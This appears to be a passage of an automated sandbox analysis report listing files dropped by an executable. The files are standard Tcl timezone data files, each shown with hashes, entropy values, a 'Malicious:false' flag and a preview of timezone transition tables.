                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Tripoli)]} {.. LoadTimeZoneFile Africa/Tripoli..}..set TZData(:Libya) $TZData(:Africa/Tripoli)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7736
                                                                                                                                                                                                                              Entropy (8bit):3.799706947156251
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:aJCP8D3pCS2JWk55EyqJNSPTub3NDOyFyJYVtLbTxdqs0xcQVq+O7JSAmwQZjltB:FSyWBSPTujlOyqc3JuzVNvTN
                                                                                                                                                                                                                              MD5:02B993B4A6956014A2DB844E8A5498C0
                                                                                                                                                                                                                              SHA1:378333547254AC43BEB4FA2CBC24B8DE241B3078
                                                                                                                                                                                                                              SHA-256:DF45F5414F1636B1856C7534BB5F3D4387C32D56283A68BB47D8C48C1DDAD5BC
                                                                                                                                                                                                                              SHA-512:CC3ABCC1FB5ABD10A685F140931DE38D6875142D3595F8D9A581F5B31A7F354FA4CCC9727B69F58E0D2F773EA0F76D9ACFDF7ACBAFC6BAA6E93A46EAE8F18672
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:MET) {.. {-9223372036854775808 3600 0 MET}.. {-1693706400 7200 1 MEST}.. {-1680483600 3600 0 MET}.. {-1663455600 7200 1 MEST}.. {-1650150000 3600 0 MET}.. {-1632006000 7200 1 MEST}.. {-1618700400 3600 0 MET}.. {-938905200 7200 1 MEST}.. {-857257200 3600 0 MET}.. {-844556400 7200 1 MEST}.. {-828226800 3600 0 MET}.. {-812502000 7200 1 MEST}.. {-796777200 3600 0 MET}.. {-781052400 7200 1 MEST}.. {-766623600 3600 0 MET}.. {228877200 7200 1 MEST}.. {243997200 3600 0 MET}.. {260326800 7200 1 MEST}.. {276051600 3600 0 MET}.. {291776400 7200 1 MEST}.. {307501200 3600 0 MET}.. {323830800 7200 1 MEST}.. {338950800 3600 0 MET}.. {354675600 7200 1 MEST}.. {370400400 3600 0 MET}.. {386125200 7200 1 MEST}.. {401850000 3600 0 MET}.. {417574800 7200 1 MEST}.. {433299600 3600 0 MET}.. {449024400 7200 1 MEST}.. {465354000 3600 0 MET}.. {481078800 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):111
                                                                                                                                                                                                                              Entropy (8bit):4.902637155364683
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/6xtNMXGm2OHrXV4foAov:SlSWB9eg/6lDm2OHrCAAov
                                                                                                                                                                                                                              MD5:36119516E87814F3C219193069CD6A90
                                                                                                                                                                                                                              SHA1:BDB25531B30E6FC454100F37177EC9D4A0FB4E39
                                                                                                                                                                                                                              SHA-256:E57746D5DB479A8B30973F2BC16E2B8DFB6E2BFAECBFF0FB956F04526E4B935B
                                                                                                                                                                                                                              SHA-512:2730C5DABA0B2CCFD32A799C48EE07351659F51B9C2B91DCD145675AF276F2D0B5AA51ACF7D283C0DC236D3AFA3A75E58EB9F970B1831A6E36F02139CAF6A655
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:MST) {.. {-9223372036854775808 -25200 0 MST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8505
                                                                                                                                                                                                                              Entropy (8bit):3.8405400251137207
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:T1ktwmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:TswDPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:87B3BCD4A793BA383889ECFDB44C846E
                                                                                                                                                                                                                              SHA1:3EA34B5E6E3078A9501653BA069D5E5E879D7FE4
                                                                                                                                                                                                                              SHA-256:A5DEB89D59613D9A54C1E146056A805B3DE9F2A2593AEC2B8A25F863328699C0
                                                                                                                                                                                                                              SHA-512:AA4DAC2614661EF18A2A60A5BD4D5BBBCCB5D721F90A25E9D11C5B6AF8C39FD475B3E23894719E2F8F74469F13D5492FF31DDD193D9E3172182FBCBCDD860A41
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:MST7MDT) {.. {-9223372036854775808 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1 MDT}.. {247046400 -25200 0 MST}.. {262774800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.884776849010803
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qfSfXHAIg20qfORL/6AdMSKBbh4IAcGEqfBn:SlSWB9vsM3y7ekHAIgpeON/68K5h490m
                                                                                                                                                                                                                              MD5:3050A0100A2313C1D3AB4278B464F17A
                                                                                                                                                                                                                              SHA1:1A140447B3972900F13768659FD6979F68126E97
                                                                                                                                                                                                                              SHA-256:F8CA38A845CD01BF785EE222277DAD9325AB6BD17E44A362C450855AEB522814
                                                                                                                                                                                                                              SHA-512:C91C4BF2318C50D473E6051855C12F0E11CBAA8580B88115CDDE054D36476A1D8DDC5D17A7A123BD84148C20B96BD839511EAD573F5FD2C9A8556646B9CDE5E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:Mexico/BajaNorte) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.8897674180962145
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0zjRJ+ovXHAIg20zjRJ8yHRL/6AdMPCoQIAcGEzjy:SlSWB9vsM3y7zjRJvHAIgpzjRJ8yHN/Z
                                                                                                                                                                                                                              MD5:FAFD9727A0E153AFCB726690D215DA76
                                                                                                                                                                                                                              SHA1:3CD3B2737FC781F38DE26E255968CBB88B773CBF
                                                                                                                                                                                                                              SHA-256:2E6E32A40487F0146B59150B66FF74901CA853B12D47922819AF23EEA5B4149C
                                                                                                                                                                                                                              SHA-512:76D110494D4EB76961C818B2A2CCB2303B31DA161664FA712C87B95B81DE7B8F3E50DC7B2836C6ECC6437AE9595668E62E4E706F1B343EFEA12C32210F113540
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Mazatlan)]} {.. LoadTimeZoneFile America/Mazatlan..}..set TZData(:Mexico/BajaSur) $TZData(:America/Mazatlan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):200
                                                                                                                                                                                                                              Entropy (8bit):4.877941255622543
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7zBDSHAIgpzBx6N/6BXl490zBf:MByMYzppzH6t6Bi90z1
                                                                                                                                                                                                                              MD5:29ACBFCD0FD521EC0C9523906B9E2252
                                                                                                                                                                                                                              SHA1:BBC1AD3F78CAA634A2F0BC38059975EF8E4A2CE9
                                                                                                                                                                                                                              SHA-256:2DFF1B83FECFAD5C27EC47B206696C29B91398F8185B5D406A66FA9E0AECA93F
                                                                                                                                                                                                                              SHA-512:802502010CFB6F1F4E60C22ECB0E6CA22750975E5838BE7E7DC9D12EA019CB6508F0F87465A113A98356CC9E145E32E6633AE2B45B93412A358C4AD13E923EFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Mexico_City)]} {.. LoadTimeZoneFile America/Mexico_City..}..set TZData(:Mexico/General) $TZData(:America/Mexico_City)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.888611285267583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG/u4WXHAIgObT/KvRRL/5E1nUDH/uov:SlSWB9vsM3ycqXHAIgObOvRN/iy
                                                                                                                                                                                                                              MD5:92548E239012515D756E002768CA876A
                                                                                                                                                                                                                              SHA1:6BDC73DBD7356C3F82C5C76E6E2D58656FA9E21D
                                                                                                                                                                                                                              SHA-256:E22D629D53C54960AD156C377DE0AE461C27F554990A3D1305724CA8F869BCE4
                                                                                                                                                                                                                              SHA-512:42AD074EE08E083EE91270F203707698A8B3308005C94514B8B2D950F4C6F0B37D7D32973EC9F6AB49A0875209076FB40341B31433A27E47B3CC0EA711ECE321
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:NZ) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.881663364410736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG9WQ+DyXHAIgObT9WQiovRL/5AmtBFB/pUDH9WQg:SlSWB9vsM3ycwQ+DSHAIgObwQTN/zzJ7
                                                                                                                                                                                                                              MD5:3811C133C6311E33FDAF93660E1EAED5
                                                                                                                                                                                                                              SHA1:64756FF877B2EB91BAED2889B3924DAB6784DF43
                                                                                                                                                                                                                              SHA-256:83F4CA3522B64F9B151EDEFAE53E0F28C2E6C4CE16D0982186B3344F2A268724
                                                                                                                                                                                                                              SHA-512:7724D6CD08E13E116CCDF073F86CE317C0D4A849C5FE81DF3127D435704507FBF554BFC6E7A50CCA3852F6001D8654B7FF90466878DB8C3298338BE16149FD32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Chatham)]} {.. LoadTimeZoneFile Pacific/Chatham..}..set TZData(:NZ-CHAT) $TZData(:Pacific/Chatham)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):177
                                                                                                                                                                                                                              Entropy (8bit):4.8545620422964015
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/5vf1+IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/pd+90+B
                                                                                                                                                                                                                              MD5:5E9F3294F68873BF503F3DDDDF6713B0
                                                                                                                                                                                                                              SHA1:954CD6F123C043E64F5E49733327E2C78877BDFB
                                                                                                                                                                                                                              SHA-256:2CC8CE235F2EE3160E6AFD04A4E28AA0312494EBB6FED08D8CC81D414EC540EE
                                                                                                                                                                                                                              SHA-512:200FC489989CA57219D5B28FB135BE5BDAC67239F3D243C496545D86D68089E51856CEAC4D2E700C0E47BAE4D5FEAB18A367C554235615B2B860F4E5E1BB08C3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:Navajo) $TZData(:America/Denver)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                              Entropy (8bit):4.902914099699953
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/nL75h4WFKdy:SlSWB9vsM3yMPHAIgO8AN/H5h4wKU
                                                                                                                                                                                                                              MD5:87C439DC623BF5C7EB01ADA6E67FB63A
                                                                                                                                                                                                                              SHA1:1CC357558E09CDEA49F821826D2AEA9A6EF2C824
                                                                                                                                                                                                                              SHA-256:6A5BAA9CA54B2A2C6D21287443BE0B1064AA79B5C4C62939933F8A0AD842B73E
                                                                                                                                                                                                                              SHA-512:E628B8F1C967AABAEFBB68A33416F6FE47422970BA18414BB3396AC063E65A4DC892595D4071395194AF320633EE915A494E1F8D4216EE8194A034739D275C49
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:PRC) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8505
                                                                                                                                                                                                                              Entropy (8bit):3.836877329152454
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:0KhTG0hjvZkR/bvtw+N6IkWq/WHQlb/RYRWVIKr7cRRL:0sG0U9bFzN6IkWq/WHQt/RY4yP
                                                                                                                                                                                                                              MD5:45E7E9E183A990F56E17C04FA48CE620
                                                                                                                                                                                                                              SHA1:A1F39E0ECEA3C64E761A9A3159E331FA51B625F9
                                                                                                                                                                                                                              SHA-256:D148708F1E70EEFA51E88E5823776CBE710535D4D6D6356E7753A44463A1C5AB
                                                                                                                                                                                                                              SHA-512:1D1F4BA90D07D7EE12DFD0E37DBFD5410A4EAFFBA8960B816FDD5963CD6B20938080A4248E7B249AAE02F068E817AB9A85735D226F7DA8DD2C5462A70B18E8EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:PST8PDT) {.. {-9223372036854775808 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-84376800 -25200 1 PDT}.. {-68655600 -28800 0 PST}.. {-52927200 -25200 1 PDT}.. {-37206000 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):909
                                                                                                                                                                                                                              Entropy (8bit):4.042826306713664
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86HbmdH2oVCvcCfdf3NaDyTb6Dye78ubUt1NEUtszIVbUtoUtoUt3mbUt4qUt6:Yekv5fcfem+Cuy
                                                                                                                                                                                                                              MD5:E5B913965F72AB807BAE67BD20C0A699
                                                                                                                                                                                                                              SHA1:2161B73EC868C8D18C09970766D19A8583FF7981
                                                                                                                                                                                                                              SHA-256:983884249ACC11C3FE740D78E72B1A89BE9C8B077283549BF6BCD8C93FA71731
                                                                                                                                                                                                                              SHA-512:F8807C52DB852C48C62F25569C990C31D977BC7D0DF502CF2B92F9ED6BCB89A6DD8A6758FBD1185E0B5C34DE5450D5C748B71760AC93E72DC3976B3B31D1A605
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Apia) {.. {-9223372036854775808 45184 0 LMT}.. {-2445424384 -41216 0 LMT}.. {-1861878784 -41400 0 -1130}.. {-631110600 -39600 0 -11}.. {1285498800 -36000 1 -11}.. {1301752800 -39600 0 -11}.. {1316872800 -36000 1 -11}.. {1325239200 50400 0 +13}.. {1333202400 46800 0 +13}.. {1348927200 50400 1 +13}.. {1365256800 46800 0 +13}.. {1380376800 50400 1 +13}.. {1396706400 46800 0 +13}.. {1411826400 50400 1 +13}.. {1428156000 46800 0 +13}.. {1443276000 50400 1 +13}.. {1459605600 46800 0 +13}.. {1474725600 50400 1 +13}.. {1491055200 46800 0 +13}.. {1506175200 50400 1 +13}.. {1522504800 46800 0 +13}.. {1538229600 50400 1 +13}.. {1554559200 46800 0 +13}.. {1569679200 50400 1 +13}.. {1586008800 46800 0 +13}.. {1601128800 50400 1 +13}.. {1617458400 46800 0 +13}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8772
                                                                                                                                                                                                                              Entropy (8bit):3.900078030355782
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pj4hKuZaqaaiFKgjGeGV3atL67G9kJGsU+mpe7Vy:Cla1KgjGeGcQMsa
                                                                                                                                                                                                                              MD5:8174D7205622711F58E0B515246FE89D
                                                                                                                                                                                                                              SHA1:9777B2633ACF5588268D5072F817E65C879358AC
                                                                                                                                                                                                                              SHA-256:201CFADB00FBCD3283249DAD73872ED75C5BEC07F5A5B157726638C20728B833
                                                                                                                                                                                                                              SHA-512:64121ED1EE70D5423710319E806B19261576AECC89A64CBEC44A29BF4AC9FEE21C6484CC3C4550CC92C315B3855BE265F696F8CD4D95027226D608B3ADD022F1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Auckland) {.. {-9223372036854775808 41944 0 LMT}.. {-3192435544 41400 0 NZMT}.. {-1330335000 45000 1 NZST}.. {-1320057000 41400 0 NZMT}.. {-1300699800 43200 1 NZST}.. {-1287396000 41400 0 NZMT}.. {-1269250200 43200 1 NZST}.. {-1255946400 41400 0 NZMT}.. {-1237800600 43200 1 NZST}.. {-1224496800 41400 0 NZMT}.. {-1206351000 43200 1 NZST}.. {-1192442400 41400 0 NZMT}.. {-1174901400 43200 1 NZST}.. {-1160992800 41400 0 NZMT}.. {-1143451800 43200 1 NZST}.. {-1125914400 41400 0 NZMT}.. {-1112607000 43200 1 NZST}.. {-1094464800 41400 0 NZMT}.. {-1081157400 43200 1 NZST}.. {-1063015200 41400 0 NZMT}.. {-1049707800 43200 1 NZST}.. {-1031565600 41400 0 NZMT}.. {-1018258200 43200 1 NZST}.. {-1000116000 41400 0 NZMT}.. {-986808600 43200 1 NZST}.. {-968061600 41400 0 NZMT}.. {-955359000 43200 1 NZST}.. {-936612000 41400 0 NZMT}.. {-923304600 4320
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                                              Entropy (8bit):4.715653436088026
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/FtTfDm2OHHhp5oHvZiuo2HvDVeEU8vScH9syZEizy:MB86FtTLmdHf5CvZiIvJeJ8HH9F6izy
                                                                                                                                                                                                                              MD5:4E858B3754BD8864719A61839ACA64E6
                                                                                                                                                                                                                              SHA1:597025A8DAFD5AE75EBD162AC0E9DA71815816BA
                                                                                                                                                                                                                              SHA-256:2D3BFDED297214BA25CFD8C6F508D0C8B1A1CD7D46701A78EC5E510076185EB6
                                                                                                                                                                                                                              SHA-512:720F301B73C852EA8EEFA79DEF6B6762554E50222DE114FE87EB5178507F1895A9A39B3872A1A4B9DFF58D1CC6460BA4A82F2C165E3659E13036451F22E389C3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Bougainville) {.. {-9223372036854775808 37336 0 LMT}.. {-2840178136 35312 0 PMMT}.. {-2366790512 36000 0 +10}.. {-868010400 32400 0 +09}.. {-768906000 36000 0 +10}.. {1419696000 39600 0 +11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8165
                                                                                                                                                                                                                              Entropy (8bit):3.6566720439018874
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:gpvlGCcn6AadFurBrioCdL49mq9X4a2t3I/KVE:gOCBdFurBr0soaz
                                                                                                                                                                                                                              MD5:8105A806A1762932897AB59C47BBE89E
                                                                                                                                                                                                                              SHA1:386E41A4A83FA84DBFCA994F679242D067CEED64
                                                                                                                                                                                                                              SHA-256:CA0EEF84DBC5964EF2265E9252237BE58BB8D75C34817CC2305CCCFAEC7E690C
                                                                                                                                                                                                                              SHA-512:8A609E7F4868BD455DA811E62142FECD792D0CA0DAAF7C10C4E4254C9EC44B8EB92D388D9224C8FD3CC3FB326A106D831B80F5E1264CCF3EABBCE177BB82E9D6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Chatham) {.. {-9223372036854775808 44028 0 LMT}.. {-3192437628 44100 0 +1215}.. {-757426500 45900 0 +1245}.. {152632800 49500 1 +1245}.. {162309600 45900 0 +1245}.. {183477600 49500 1 +1245}.. {194968800 45900 0 +1245}.. {215532000 49500 1 +1245}.. {226418400 45900 0 +1245}.. {246981600 49500 1 +1245}.. {257868000 45900 0 +1245}.. {278431200 49500 1 +1245}.. {289317600 45900 0 +1245}.. {309880800 49500 1 +1245}.. {320767200 45900 0 +1245}.. {341330400 49500 1 +1245}.. {352216800 45900 0 +1245}.. {372780000 49500 1 +1245}.. {384271200 45900 0 +1245}.. {404834400 49500 1 +1245}.. {415720800 45900 0 +1245}.. {436284000 49500 1 +1245}.. {447170400 45900 0 +1245}.. {467733600 49500 1 +1245}.. {478620000 45900 0 +1245}.. {499183200 49500 1 +1245}.. {510069600 45900 0 +1245}.. {530632800 49500 1 +1245}.. {541519200 45900 0 +1245}.. {56208
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.943709180393636
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yci/452HAIgObi/4oA6N/ZE/4pv:MByMdNXiU5tVv
                                                                                                                                                                                                                              MD5:7D9980F68F044EB9B7FA7ED2883645F2
                                                                                                                                                                                                                              SHA1:9444DA9D3139F51C6DFDA174C8C52A231215D71E
                                                                                                                                                                                                                              SHA-256:F324CA637180F50DB79FFA25204D974C6A7A6FAEFDA69FD1A280B9F366349A09
                                                                                                                                                                                                                              SHA-512:850577ABD3A3653076797D46AF481343CDF8103AC597EB68F575C5FF4931242C6ACEB054D14E0F6A9A90E5D22069F78027215A4E44FC900292445FDEAFB8F92D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Pacific/Chuuk) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8203
                                                                                                                                                                                                                              Entropy (8bit):3.5469404823178463
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QXn3AWkHkPp2YXaVU+POtUn4n6MSmSmiTpk9eL6Z5waKkhWILTc:QXn3AWJB2m+POtUnOSmSmS6ZaILg
                                                                                                                                                                                                                              MD5:002F3607DE2061A2E1A8EB8EBCB6E492
                                                                                                                                                                                                                              SHA1:6521B47847CFA76FE45AE5CC649109E4AD6C5262
                                                                                                                                                                                                                              SHA-256:D79A2A67606F25D6420F31129FAE966A54287DE96C661003CCE5F82B618014BC
                                                                                                                                                                                                                              SHA-512:03F3F262538FAF5A1B38832EFA62E3CC41A70BF54E73DE59BC99DCCA035AB002142F42BEDA5BFC2102CD556601E0A278908FDCC838A2211AC63C49A8483CE72B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
